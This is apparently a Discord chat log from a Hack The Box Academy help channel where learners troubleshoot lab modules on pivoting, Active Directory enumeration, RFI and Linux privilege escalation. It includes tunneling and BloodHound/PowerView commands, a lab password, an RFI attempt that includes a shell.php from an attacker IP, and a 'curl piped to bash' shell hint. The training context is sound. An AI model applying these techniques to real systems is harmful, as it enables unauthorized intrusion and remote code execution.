#modules

Proxychains

I think this should not be an issue right?

proxy_dns
strict_chain


# add proxy here ...
# meanwile
# defaults set to "tor"
socks5    127.0.0.1 9050

@fathom pendant

Looks fine

¯_(ツ)_/¯

Also dont copy/paste the configuration like that, due to markdown discord treats # as header tags

thank you so much for your time @fathom pendant , i will take care of that

Wrapping in codeblock works best

indeeed

But i suggest reaching out to support if my troubleshooting suggestions dont work

definitly

@fathom pendant applogies to disturb you again, on the same machine I was doing some experimentation:
Using these command i was able to login:

ssh -L 3389:172.16.5.19:3389 ubuntu@10.129.101.20
xfreerdp /v:127.0.0.1 /u:victor /p:pass@123 

would you have any clue why this worked, proxychains xfreerdp.... is not working

You forwarded port with ssh thats why i guess

You're binding your port 3389 and forwarding it to the remote 3389

-L "Link"

At least thats how I read it

exactly....I know that much...but I guess Proxychains and xfreerdp3 need some configurations to work together

Because 127.0.0.1 is a local host...u cant ping that from outside

Ssh is routing your traffic to local host

-L [local_interface:]local_port:remote_host:remote_port

Actually no

Thats y you were able to do rdp while its running on 127.0.0.1

It's routing the traffic from the specified port through ssh to the remote machine

exactly, but when using ssh -D 9050 ubuntu@10.129.x.x and using proxychains xfreerdp... i wasnt able to login

👀

I cant figure out this differential behaviour... as both serve the same goal...one succeeded one didnt

It's not routing to your localhost

Port forwarding

Same goal, different methods

Routing traffic from -> to

From left to right

I hope you remeber we were unable to login via rdp using proxychains

Well he got it

Yeah

But at some time u did without sudo

that was for NMAP😅

Ohh

Hahahaa

Sudo really is only required with nmap due to packet nonsense

Yeah sudo works with nmap

He was trying sudo with xfreerdp

I guess

"also" 😂

Hi.

I'm in the Hacking WordPress - Skill Assessment.
I'm stuck on this question, I finished the assessment and got RCE but cannot find this flag.
The Hint says review the WPScan result but I did and that did not help much.
There is not "Unauthencatied File Download" vulnerability in the output, but there is LFI which I used to gain access to another flag.

🤣

Module number

send the link...to module

There's a search feature in academy

I think i have gone through this

They even said the module name

I am not sure

And section name lol

Can u tell module number

😅

I am on phone

🥲

I can access academy on phone, just turn on desktop mode in the browser

Yeah its possible but its really small screen which i am not really comfortable to

https://academy.hackthebox.com/module/17/section/64

I hope hackthebox can come out with a mobile app so that I can learn more conveniently.

I remember a while ago, I was studying with my phone outside, but I couldn’t operate pwnbox better, which was very frustrating.lol

Nice try btw

In documenting and reporting module they say :
"Do yourself a favor, use Word for Windows, and explicitly avoid using Word for Mac. If you want to use a Mac as your testing platform, get a Windows VM in which you can do your reporting. Mac Word lacks some basic features that Windows Word has....."

Any other solution for this? Im on mac but when im doing the exam i'll have lot's of windows open, already 1 vm, and running another vm with windows will take up lots of resources

Word is also available online

You can try that

Or u can try google one

ummm, i'll do that then, thanks a lot

Welcome

So i can use google docs?

at least u can try

its free

so is word, but for the cpts exam maybe I can't use google docs?

For CPTS just use sysreptor

They literally have a section called "HTB Reporting" where they have ready-to-use templates for CJCA, CBBH, CPTS, CDSA, CAPE, and CWEE
https://docs.sysreptor.com/

oh wow brilliant

thanks a lot @hasty mauve

Salut !

hey, has anyone doing the Linux Local Privilege Escalation - Skills Assessment managed to get a shell on the box without using the provided SSH creds? i tried a bunch of stuff but no luck so far just wondering if it's even possible or if i'm overthinking it – any hints or confirmation would help.. i tried every attack path for tomcat man... i just need to figure it out to go on :))

Welcome. Please read and follow #rules and #welcome , as a reminder, this is an English server only

@storm elk do you know who i am?

Waiting for PowerView to grab a groups ACLs takes mega time atm, over 60 minutes and just hanging, getting a user's ACLs fine tho.

AS far as I can see in the section text I'm following it. Question wanted me to check the GPO Management group

just from gpo...there is a vuln in gpo..we can make new gpo and use it for our purposes

i think you can check that...

Thank you

welcome

I solved it.
Turns out WPScan did not detect the "Unauthorized File Download" so I had to search for it manually on ExploitDB.
This is kinda stupid tbh, but it is what it is.

Is the Web Service & API Attacks the CBBH version of Attacking Enterprise Networks?

like Is it worth a blind attempt?

or should I just go with the walkthrough?

Hi All, once my year subcription ends, will I still have access to the already started modules? if its 1/20 for example?

As far as I'm concerned.
You only keep access to the modules that you already finished.

Makes sense, I was curious if the module is considered "Already purchased"

That is a very important realization. Just because an automatic tool doesn't see it doesn't mean it's not there...

only if you unlocked that module with cubes

u will have access for it , even if your subs expires

However fully complete sections will always be available? regardless of sub?

yes, they will

yo guys

im on privileged access from AD attacks

so the question says What other user in the domain has CanPSRemote rights to a host?

so i collected all objects in the domain using sharphound

and transfered them to my linux

i uploaded all the .json files to bloodhound

and i used this cypher command from the module (which, should show all users with CanPSRemote permission)

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

but nothing appeared

i ended up using powerview to get the members of remote management users group of the ACADEMY-EA-DC01 (because i already know that computer name exists, so i tried it. but what if i didnt know it ?), and i got the user

why it didnt appear in bloodhound ?

Bloodhound's data depends on your ingestor and not all of them are created equally nor do all of them gather all the data, it's still better to use other command line tools or to modify the ingestor

Just wondering, is there a way to "reset" a module and do it again? Erase the answers

nope

ended up using this
foreach ($computer in $(Get-DomainComputer | Select-Object -ExpandProperty Name)) { Get-NetLocalGroupMember -ComputerName $computer -GroupName "Remote Management Users" }

i guess it would do the job later too

Oh... Thanks. It would be cool

Yeah,Welcome

In my CBBH I used MSWord on Mac OS and works good and was acceptable,

For the Advanced Command Obfuscation answer make sure after ip= that there is no newline or spaces in burp repeater

if you have the correct NTLMv2 hash, rockyou should do it

Just did retire nibbler model in the walk through academy

One more to go for the beginner part privilege escalate to root

Is Linpeas good to use for the boxes it does a lot of enumeration within it

Hi Community
I cant get VNC creds in CAPE skill assesment lab, I make user Arturo as local administrator on SUPPORT but cant find vnc cred, please give some hints

https://academy.hackthebox.com/module/263/section/3095

5th question

This is all about lateral movement, so if you can't find it on one host, you likely have to move laterally to eventually identify it.

I know that you mean Backup host but I didnt find any way to move that host, no open ports, and also rev shell with wsus update didnt worked

I would keep trying the WSUS part you mentioned. You can DM what you have tried. Might be a simple thing that was overlooked.

Thank you

so nobody can help me out with this?😥 any hint would be appreciated...

Yeah its good, it gives all you need at once...then it's just matter of how you read linpeas output...but even in linpeas output you need to filter noise

Whats the name of the module

Linux Local Privilege Escalation - Skills Assessment

I havent done that module, but you can try rev shell

Or rdp

Hi anyone free for a DM for DACL 1 Skills assessment, just want to clarify something in regards to the ACL

Then use curl and pipe it over to bash

@gusty cobalt let's try not to spoil info for modules above t0, even if it's an alternate way to get a shell

https://academy.hackthebox.com/module/214/section/2285

Can someone help me out?

I found the process argument but it's not working

Possible to get help?

No one was helping me since yesterday

I haven't done that module

Oh

I'll be back at my PC in a minute. You can DM what you have.

HTTP Status 405 – Method Not Allowed<😥

help plesase

@proper dove dont spoil module content

Use the literal word 'PORT' instead of the given port

you might be missing some of the arguments

Hey, i just found someone with lot of the academy content outside of HTB without mentioning HTB, can I DM a moderator ?

Report the website using /spoiler [click the one that is hackster]

Thanks

Dm me

Dm me

yo guys im trying to copy printspoofer.exe to a host for PE though an mssqlclient.py session with xp_cmdshell

ive made an smbserver.py with creds because host dosent allow guest auth to smb share

when i type xp_cmdshell whoami i get nt service\mssql$sqlexpress

Sorry , thx, work !

the password (as the module mentions for this sql service account) is SQL1234!

thx, its done !

Np

so i tried setting the user in smbserver.py to mssql$sqlexpress and password to SQL1234! but when i try to download the file using xp_cmdshell copy \\ip\sharename\printspoofer.exe i get the user or password is incorrect

Hi I am currently on the active directory enumeration and attacks and I am having lots of issues with rdp. I've tried multiple solutions and I just can't connect for some reason

windows sometimes doesn't like a blank user/pass

Name of the module

same rn, use the pwnbox

I am

I am not using the vpn

oof

that's a mood

im using the target service account's creds

well if you're copying from your own smb server

its been like that the whole day but it just returned working before a while

Does anyone else have an issue where you try to ssh the target, but then you are unable to type the password?

Ok I'll keep checking

its annoying when it happens tho

sometimes it stays like that for days

you can type the password; it just doesn't show up. This is an intentional security feature

Oh

Hey guys

what u think the username should be if whoami returned nt service\mssql$sqlexpress ?

i guess it acts wired cuz its a service account

well no, what I mean is that if you're copying a file From your smb share, sometimes windows doesn't like to grab files from a service you're not authenticating to. (i.e. your smb share isn't using a user/pass, so Windows doesn't like that)

@limber schooner this isn't the server for that kind of nonsense

Soryy

the general only way an account gets hacked is if you run a program from a "friend"

but this isn't a tech support server.

best practice is to just reset and change all your passwords

Yes i think

I was initially right

for the question above earlier

i just didnt put a "," for exit which was sutpi d

lol that's silly

wrong reply also

yeah, it's silly how they made me do it, even though what i had was right and I knew i was correct

I just wanted to bump this, i found the process and killed it but it booted me out of the target, has anyone ran across this issue?

You’re trying to replace the original ntds

You don’t need to place the copy there

Focus on the blog

goddamn it

thank you

I have a question, since i completed this. How do I check what modules i done for that path?

So i can go back and read stuff over

oh

didnt een know that was a thing

will say this took me a week and a half to do

Oh boy im scared about the exam

yeah im just gonna look at the CPTS win priv escalation before i do anything

Can DM what you are trying.

could someone help with with the skills assemsent on the cbbh module

hi

@verbal ivy why i cant chat in general?

sorry for the ping

How am i related to that

hum i dont know but i cant write in general chat

u can help me?

Tag a mod not me

uo ok

@novel matrix why i cant chat in general chat sorry for the pin

Guys hello I bought wireless usb adaptor and can anyone help me to configure it?

https://academy.hackthebox.com/module/143/section/1489 i did first question ,
how to do 2nd question that is ,

• 0 What is this user's cleartext password?
  i guess we need syncron user password it is ? how ?
  when i run secretsdump.py it give some hash but not for this user.

Same thing for me, and that's considering that the web app is mega slow

Cleartext means you need to crack the hash

anyone help for https://academy.hackthebox.com/module/147/section/1657 I established the tunnel but whenever i try to run some command it yas timeout, i got kerberos ticket in my enivroment it was valid so i dont think is due to that, and the tunnel connected

Hi everyone, im tryng to install SecLists and Gobuster for the Web Enumeration module, but as you can see the installation of both give me an error, can someone tell me how to fix it?

--fix-missing generally works

Can u give me the entire command?

sudo apt-get --fix-missing

Is this for SecLists or gobuster?

It's for installing missing packages that may be preventing full installation of any tool, including seclists and gobuster

This is the output

Seems that there is a syntax error

I'm trying to install defaultcreds-cheat-sheet with pip3 but it gives me this error. I tried to do what it tells me but it doesn't work. I tried to search online and I didn't understand much.

oops

sudo apt-get update --fix-missing

Same error during the sudo apt install gobuster

python3 -m venv myenv && source myenv/bin/activate

run this as root

can you share the error?

this should work

This one

The same than before

You're getting that while using the --fix-missing argument?

thanks

Try using pipx

Pipx install <name>

I have run sudo apt-get update --fix-missing and then sudo apt install gobuster

Update and upgrade

Then install gobuster

Im tryng

I'm too tired to try debugging apt at this time

@devout lily Try either installing with go, or building it from source: https://github.com/OJ/gobuster

Read your error. A simple Google search will likely help you.

Hi how can can we get bsd brawl pls

Anyone got a decent cheat sheet for windows privesc?

Module: MSSQL, Exchange, and SCCM Attacks/SCCM Site Takeover II/ question2: Connect to the shared folder \LAB-DC\SCCMShare\SCCMServer01 using the hash of SCCM01$, and read the content of the file flag.txt.... i got the hash, but cant connect, either login failure or connection refused

I hate and love this answer because I feel like itll be a little complex when he starts digging into why, if the problem he is having is what I think he is having.

Can you authenticate with netexec using the user and hash?

Idk, I am pretty sure I've had this same error before and a little GoogleFu got it sorted out.

nope. nxc just breaks now out of nowhere

Restarted the lab?

let me try that

didnt work

You can DM if you'd like.

thanks mate, i will get some rest now, and dm you later, really appreciate it

Guys if this question is not appropriate pls delete or forward me to another place. I bought usb wireless adaptor for my VM but when i hit command sudo airodump-ng wlan0mon I don't see any networks it starts working but doesn't show me networks?!

You don't need a USB wireless adapter for the modules.

I need it for myself

im doing ctf fawn and taks 7 says : What is the command we need to run in order to display the 'ftp' client help menu? and i said ftp -h i searched on youtube other ppl doing it for them the answer works for me it dosent can anyone help

You are aware that attacking networks for which you do not have explicit permission is illegal.

Bunny I know what is legal and what is not legal may be I just learning something new for myself may be I have an assesment with a client to check his or her wireless networks there may be many options

There are many possibilities, but this has nothing to do with HTB.

I know that it doesn't have but possibly here will be a person who will help me and as there is no such person the question is closed

can someone help?

There's a whole list of compatible wireless cards for linux

Fawn is from StartingPoint, right? If so, then ask in #starting-point

You'll need to link your account via #welcome instructions

hey guys in the skill assessment medium footprinting, after i found the creds through mounting the nfs server, when i tried to xfreerdp into it like this
xfreerdp /v:10.129.220.178 /u:alex /p:"....."
it throws this error

bash: !mD: event not found

i tried to bypass it using set +H and then set -H after i execute the cmd, but then the rdp connection prompts this
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:227] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - freerdp_post_connect failed

can someone help me with this

Put the password in single quotes

! Is a special character in bash to invoke history

did that and it did the same thing aswell with the rdp response

idk if its a problem with my vpn or something, cuz i can ping the target host without any error during transmission

Try resetting the target

Or changing vpn regions

Or resetting your vm

is it an issue that im using the UDP version?

lemme try using the tcp and resetting the target

this fixed it, thank you so much dude 🙏

As a general tip: /cert:ignore /dynamics resolution

?

Im confused by the AI red team Manipulating the Model exercise there is no fixed input message or and indication of what the questions for the exercise wants?

@coarse crest thats not what this server is about. Reach out to the website support for whatever company you lost your account on.

Reach out to their support

I did they can't do anything about it

oh ok ima add it to my notes thx so much dude

Then that sucks, but we can't "recover accounts" as that involves committing a felony in order to recover your account

Ohh it's alright thank you

Can anyone help me understand what Manipulating the Model exercise answer requirements are for the questions its not clear to me what its looking for in a text answer?

may be you specify module and section you are working on?

Introduction to Red Teaming AI - Manipulating the Model

Marcie may I ask you for an advice which adapter normally works with kali linux and blackarch linux? they don't specify chipsets on boxes usually may be you know the model?

A serious community is always good, and in a way it is also a science of formation and organization while maintaining authority so that the community does not give the impression of a complete fan community. In this community, this is not observed, no matter who is doing it.

?

There's a list of compatible devices, and Google can help figure out chipsets. It's completely irrelevant to academy.

In every community you seek seriousness, like a reliable shore in a stormy sea. This is the science of order, of how to maintain authority so as not to get bogged down in the chaos of a fan club. But here, in these parts, this science cannot be found. And it does not matter who was looking for it, who needed it. All efforts were drowned in silence.

? We redirect people to the appropriate places to ask questions, if possible.

There are more serious channels, but those require linking your htb account to view and access

Is there really nobody that can assist with Intro to Introduction to Red Teaming AI - Manipulating the Model I just want to understand what the questions for the lab want?

Anyone done the User Behavior Forensics module? I'm stuck on the last question in the skills Skills Assessment, i've found the timestamps of the copy paste event in the sqlite db but they aren't right apparently.

Guys i did the Learning Progress module but i cant understand the last and only question that says:
1.00 to the power of 365=1
1.01 to the power of 365=37
"What is the difference between the two numbers of the learning progress mentioned above?"

Like i understood it and answered it but It keeps saying "incorrect answer" what should i do 🙏☹️

The difference == big - small

Still incorrect

Also, decimals matter

1.01^365 != 37. It's 37.7

It's even stated in the reading portion

hey guys im finally done with the footprinting module, but i mostly struggle when i access IMAP/POP3 servers, like their queries are so stupid so does any1 have a good cheat sheet regarding their stupid queries

I tried to find some for them, but couldn't find for some rzn

I used an atmail blog for my imap notes

whats that

https://www.atmail.com/blog/imap-commands/

A blog, by a company (atmail) that details commands

oh finally man something thats nice, thanks so much dude 🙏

I thought it was mirror problem, is it something else? You don't gotta go into detail

Why can’t I talk in general

Because you need to link your account, there's instructions in #welcome

Ok

Yeah just a sources list issue. Easy fix.

please help 😦 I am doing the Remote File Inclusion (RFI) section in the module named File Inclusion

I tried curl and ping to the ip, everything works just fine on both the browser and the terminal. The page shows
<h2>Containers</h2>
<br />
<b>Warning</b>: include(http://10.10.15.173:80/shell.php): failed to open stream: Connection timed out in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'http://10.10.15.173:80/shell.php' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />

hey i actually got it, i couldnt sleep cause of this... why i was stuck was cause, they didnt explain this in the course material, so i had coerce a second time for the intentended machine so it can create a socks relay, for this to work i had to petitpotam twice, not once like in material or even the solution, which made me doubt myself even more. at last i got it.

i dont think someone that follows the course will get it, kinda feel bad for them, knowing how rare someone actual can help

and now, i must pay back my sleep debt 🤌

It was covered in this part of the section: NTLM relay from a passive server. Regardless, I'm glad you sorted it out.

I did that 3 months ago, i forgot

All good, get some sleep.

not sure if this will help those in the future but wow, went to bed. started a new pwnbox and copy and pasted the same hash in and rerun hashcat with rockyou.txt, again same as my notes and suddenly it cracks. thanks for the help

true, i figured out how to do it in the beginner module getting started and nibbles box. i had download the file then insert the .sh into the vulnerable part it was under a diff name so i couldnt find it lol but i got it

i had such a hard time with this skill assessment too, i ran into some troubles with another hash for reason i still don't understand so i'll just blame the environment for it lol. glad you made it work

Yo guys Ive been stuck for a while on the Password Attacks assessment. Ive Gotten RDP into JUMP01 and I have tried EVERYTHING (ive thought of) but the only thing I have gotten is a password like
<AdministratorPassword>
<Value>REDACTED_r00t!@0</Value>
<PlainText>true</PlainText>
</AdministratorPassword>

But I cant use this to gain Local administrator rights??? Is this for another account? is this just a red herring? is it not local admin???

ive also found a .psafe3 file but Ive tried to use that password with no success.

Im legit stuck. Ive been doing this for 5 hours and I have no clue where to go. If anyone has any hints for privesclation

You can DM

I need help buying the CJCA exam voucher

You'll need to reach out to support on the website if you need help with that.

sudo apt install gobuster

stuck on getting started privege escalation to root

i was able to get lineum running maybe gotta mess with reverse shell a bit a different one

Always check for which privileges you have.

yes i ls -la

no, that lists the contents of your current working directory

re-read the section about privileges and try some of that

hmm ok

i did echo $TERM it came back as "dumb" lol

Again, go re-read the User Privileges section. I don't see $TERM as one of the things it shows you.

i did sudo -l im going to look because i think its staring me in the face

i already did linenum imma recheck ill hit u in a few

@dry falcon Please do not spoil content from modules above tier 0

Can u do 'sudo -l'

yes

/usr/bin/php is nopasswd

if im saying too much let me know i dont wanna spoil it for anyone else doing this one

bruh

i feel like i worked around this

it was in my effing face

hey guys can anyone help me with this please i have the Summary report but i cannot find the pass

You can dm me

https://gtfobins.github.io/ this is a really good site

wait nvm

ok imma check it all out

It means that you can run php as root, so you just need php syntax to execute bash commands

yes, imma messag you

thz bro

can anyone help me guys 🥲 idk what to do, its in module: Password Attacks, section: Credential Hunting in Network Shares

Patterns are helpful

update: i escalated with the help of thefieryflame

i was doing it all backwards

I just finished this section but I don't remember ever using this file...

yeah, you can dm me

fieryflame is the best

he explains teaches

i was banging my head on the wall for that module for 7 hours

https://academy.hackthebox.com/achievement/2059161/77

has anyone managed to solve prompt injection module jailbreak 2? i got the flag but i didnt solve it properly, the llm didnt even give me proper response needed for conditions to flag but i got it anyways

@opal shuttle bro thank you so much for helping me, you r the best 🙂

can any one help me with remote & local port forwarding with ligolo-ng (i searched up internet for 2 days still cant figure out) ; D

Port forwarding and tunneling module?

i completed that module i am just confused with port fwding with ligolo

Ohh ohkk

Plenty of guides online

From: the remote interface:port
To: either your device or some other remote device

I suggest messing with ligolo in the double pivot sections in the port fwd sections

i found dante to be good for ligolo practice if u plan on doing that

If you have a solid understanding of port forwarding it makes sense

i do have that but the ligolo commands messed with my head

had to use ssh port forwarding with ligolo

I swear theres some syntax stuff in the ligolo docs

i checked it tested it. it wasnt working for me for some reason

it helps to know what youre struggling with ¯_(ツ)_/¯

wait will drop command here

Like is it the --from --to syntax?

listener_add --addr 0.0.0.0:11111 --to 127.0.0.1:22222 --tcp

its just this

listener_add --addr 0.0.0.0:30000 --to 127.0.0.0.1:10000 --tcp

after using it how should i use my http.server to transfer file to target or vice versa (i tried it wasnt working)

Your http server should be running on port 10000 (if its just a single hop)

--addr is the remote/target and port

Will try that. Thank you

For multiple hops, --addr <either 0.0.0.0 or a specific interface on the target>:11601 --to 127.0.0.1:11601

Repeat for each hop in the session

If you run ligolo with sudo it can even create interfaces so you dont have to stop/start sessions in order to continue pivoting

Thanks a lot

I think i ended up setting the suid bit for it bc im lazy lmao

And as a general tip, for windows machines you may need to do
Set-ExecutionPolicy Bypass -Scope Process

Otherwise it can cause issues

Hello !

Did the machine for Velociraptor work for you ? The path URL never work with VPN or HTB VM 🙂

• Introduction to Digital Forensics > Evidence Acquisition Techniques & Tools

Its because

Nvm

Sir, did you have a stroke?

Yeah but i am fine

Thanks for the care btw

👍

Hey! I'm getting these errors when doing SSH port forwarding, any tips?

channel 4: open failed: connect failed: Temporary failure in name resolution
channel 5: open failed: connect failed: Temporary failure in name resolution
channel 6: open failed: connect failed: Temporary failure in name resolution
channel 7: open failed: connect failed: Temporary failure in name resolution

Connection issues most likely

Could it be an issue on the BOX? I've tried disconnecting and connecting again and still get these.

Try using chisel

Never used it but ok I'll see what it is

Yeah it worth learning

I vaguely remember there was mention of it in the port forwarding module, I'll re-read it. Thanks

Ligolo-ng is superior

What module is this for? If its for a box, ask in #boxes and provide the box name and maybe someone else can help

This is for the AEN module

Ah, I used ligolo for my pivoting

I see people don't like to use SSH? Is it bad compared to chisel or ligolo?

Ligolo sidesteps the need for proxychains, it works on a different layer

And allows icmp traffic

Thanks... So are you saying I shouldn't use SSH and learn ligolo instead?

If you understand the fundamentals of how pivoting and port forwarding works: yes

Got it. Thank you, Marcie!

just wanted to know once i complete a module, even if my subscription runs out will i always have access to that information for reference?

Yes

Any module completed under the access based subscriptions are yours forever

it's a good idea to know how to do both, there are some cases where the only entrypoint to an environment is TCP/22 inbound

perfect, thanks.

or: the jump host has a public IP, but you don't

Hello, where do we report bugs? Cubes icon is gone from the academy!

#1234357888114364508

Or, reach out to HTB support if it's a technical bug

Can you see it or is it just me?

Uh not sure. If an icon isn't loading, it could just be you

The cube icon is gone from everywhere in the Academy, modules, menu, Billing Page

I still see the cube icon. Unless you mean the number of cubes you own. You can find that in billing

Yeah, I see the number but I don't see the cube logo, the green cube

Not sure about it, might be a UI update. Reach out to HTB support

anyone here happen to have experience with the tool subbrute? I just can't seem to get it to work.
Module: Attacking Common Services
Section: Attacking DNS

Like if you open any module, it is blank, no cubes on the right side of the section for example. Yeap

again; htb support

I still see em

Are you using firefox?

yes

idk if its just my end but HTB visual bug happening, no extension button. Probs the image ref failing.

Hello, i'm using the HTB box, 'LLMNR NBT NS Poisoning from Windows' , i have to use Inveigh in RDP, but the session crash, i can't close the rdp session...

seems we're experiencing similar, ive reported

Good I ain't alone

bummer academy is having some issues, all of my progress is bugging out too!

Exactly, this is what I was talking about!!!

Why doesn't it let me paste images in the chat

ah okay then I am having exactly the same issue as you lol

you need to vatat

Ahhh gone for me too when I refreshed page

*verify

Alright

I thought what could vatat possibly be lol 😄

clearly means "verify at the available time"

Some next level cover

on brightside the progress is stored elsewhere just a visual bug, support looking into it

As long as the progress is not tied to this visual bug, it's bearable

imagine if it was client-side progress only 😄 then people would be able to 100% the course and take an exam without ever doing a module

But now I realise how more satisfying is having those cubes

it really is a huge motivator and demotivator if you haven't got far through a module ikr!

36 sections basically is 3 modules in one this AD Enumeration 😄 fun as hell tho

I am currently doing the Introduction to Windows Command Line. Lots of text

https://tenor.com/view/schmidt-novel-text-message-text-message-gif-3544541

some modules be like that...

Have been troubleshooting for over 30 mins only to just realize I forgot to connect to the VPN FML

Do you practice after every module in Labs or you firstly finished all the general modules like which are the prerequisite for CPTS i.e and then went into labs?

I haven't 100% the course yet so im at 66.7% I haven't done pro labs yet but I frequented VulnLabs over last 6 months, once done ill probs do a few labs and AEN blind and see where im at

I mean machines in HTB Labs, not the Labs themselves😅

ooh the labs as in bottom of each section / module ?

these?

No, like machines in Starting Point, Retired ones...

^ not related to Academy

I see! yeah I probs won't do much outside of academy and then reinforce with Pro Labs only, see where im at

Hm, are you satisfied with the practice just in Academy?

There is a checklist of labs machines that are good for prepping for CPTS

AEN Blind will be the answer for that question

I dont know how bad my methodology is till I actually put it to work

What is AEN?

Attacking Enterprise Networks, last module of CPTS

I see

It has been mentioned doing this blind is the real test before your exam, writing a report etc

I am still not sure whether I wanna proceed first with CPTS or CBBH after I complete the Information Security Foundations. I know both are different, but both seem engaging, especially CBBH could be put in more practice irl for now, i.e, I think

you got a subscription or you buying with cubes atm?

I wasted first few months of my sub so I am doing cpts only now

I am using the Student Sub, but in August I will buy the Silver Annual. CJCA looks like a good start too before the other two exams.

when you do CPTS youll find the modules overlap with CBBH so im almost 2/3 way through and I barely did any CBBH modules intentionally

I just wanna jump into machines, but I ain't sure how much should I know before I do that

That's great

visual bugs have gone for me

Yay, indeed

yeah

when you will complete CPTS, your CBBH will be 64.9%

I've found just diving in into retired boxes and going as far as you can, then using ippsec or official writeups to help poke you along to be effective for me. I learn more by doing than anything else personally, and I feel you'd find the same. Just my 2 cents.

Perfect timing 😄 was just going to ask if you knew!

thanks for this

🫠

Hello, good morning (here it's morning) I would like to know if anyone knows of a store like Silk Road on the dark web.

Not the place for this @hybrid sandal

I live in Brazil

Not for clear net discussion)

anything I import I pay double the price

im not sure if this is a serious rule break or not, waiting for a mod to decide 😄

Ops sorry

Thank you, but have you still done the foundations part in the Academy before attempting and some initial modules like NMAP, etc.

I find you just have to take the first step Rich, start doing one of them, then you'll know which one you prefer

and take the time to make notes, don't just CnP like I did in beginning 😄 have to revisit a few modules knowing that

I'd start with the starting poit boxes then when you get to the "Getting Started" part in the academy. (assuming you are going down the Job tester path). A lof of the stuff in the "getting started" module can be used on stuff in the Starting Point and will help you get your bearings. That's how I started.

me getting same error how to fix it 😕

Yeah, I create cheatsheets and note other useful information in Obsidian to later refer to. Yeap, I can't wait, but I think will give myself some time to finish the Intro part, and then will jump straight into the paths. I for sure by the time have finished some module may forget something I learnt, but I think quick refresh through the module and notes will bring back the knowledge. But of course this is probably because of sort of lack of proper practice.

I have finished this module and was very proud when I pwned the final machine in the module myself, very satisfying

I guess there will be no deals on the VIP plans before Black Friday, as I am really looking into getting the VIP+ too

Did you buy your sub right in the beginning or I can benefit in some way having the free plan?

Thats awesome! Its a great feeling and it's all very rewarding. I'm 33 percent through the CPTS Path and I love every bit of it.

On the starting point I saw only half of the machines in each section are free, but would that be enough for beginner

I personally just bought the annual VIP+, but it was on discount around December when I did... it was like 120 for the year? 150? I dont emember exactly

Yes in my opinion

Yeah, I missed my chance in 2024

They do it every year from what I saw. Not sure if it's accurate but from what I gathered last year, they do that consistently around that time

Probably will wait then, and grind the free ones in the meantime together with the Academy sub

Perfectly reasonable.

Thanks for the suggestions and help

How to start my ethical hacking journey. What type of knowledge is required but the way i know coding like python and web development. Can some one guide me

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

HTB course are too expensive for me so can give me some another option

There are many modules in the Academy that are free of charge.

Thank you

web + machince https://tryhackme.com/r/resources/blog/free_path
web master : https://portswigger.net/web-security/dashboard
linux + reverse enginnering + more https://pwn.college/
tire 0 free if u complete each module u get cubes back . https://academy.hackthebox.com/
linux basic commands https://linuxjourney.com/

Which module

I am doing Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux section in Active Directory Enumeration & Attacks. How to solve clock skew error as the attack host does not have either ntpdate or faketime?

└──╼ $GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
<snip>


[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

I even tried to pivot and use my own host tools but got a new error

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo timedatectl set-ntp off
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u FREIGHTLOGISTICS.LOCAL
[sudo] password for faiz:
2025-08-01 15:37:44.541814 (+0500) -86524.735147 +/- 0.214486 FREIGHTLOGISTICS.LOCAL 172.16.5.238 s1 no-leap
CLOCK: time stepped by -86524.735147
CLOCK: time changed from 2025-08-02 to 2025-08-01

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley: -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
<snip>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u INLANEFREIGHT.LOCAL
2025-08-02 15:40:08.602184 (+0500) +86524.697654 +/- 0.150084 INLANEFREIGHT.LOCAL 172.16.5.5 s1 no-leap
CLOCK: time stepped by 86524.697654
CLOCK: time changed from 2025-08-01 to 2025-08-02

┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies

<snip>
[-] Principal: FREIGHTLOGISTICS.LOCAL\mssqlsvc - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
[-] Principal: FREIGHTLOGISTICS.LOCAL\sapsso - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)

Changing vpn server solved the clock skew in the first place.

Hey guys, is there anything I can do about this? Idk if I accidentally posted something here or if it's because of my blog...

Reach out to support

How long does it typically take to hear back? I was planning on working through the academy all day today

I wish somebody would have tried messaging me first either on here or on medium

for gobuster, how many threads (-t) should be speedy, yet stable?

Hello! I could take a hint on how to transfer files from client-provided ATTACK01 Parrot box back to my system. I'm currently working on AD enumeration and attacks, initial information gathering of the domain,

https://academy.hackthebox.com/module/143/section/1265

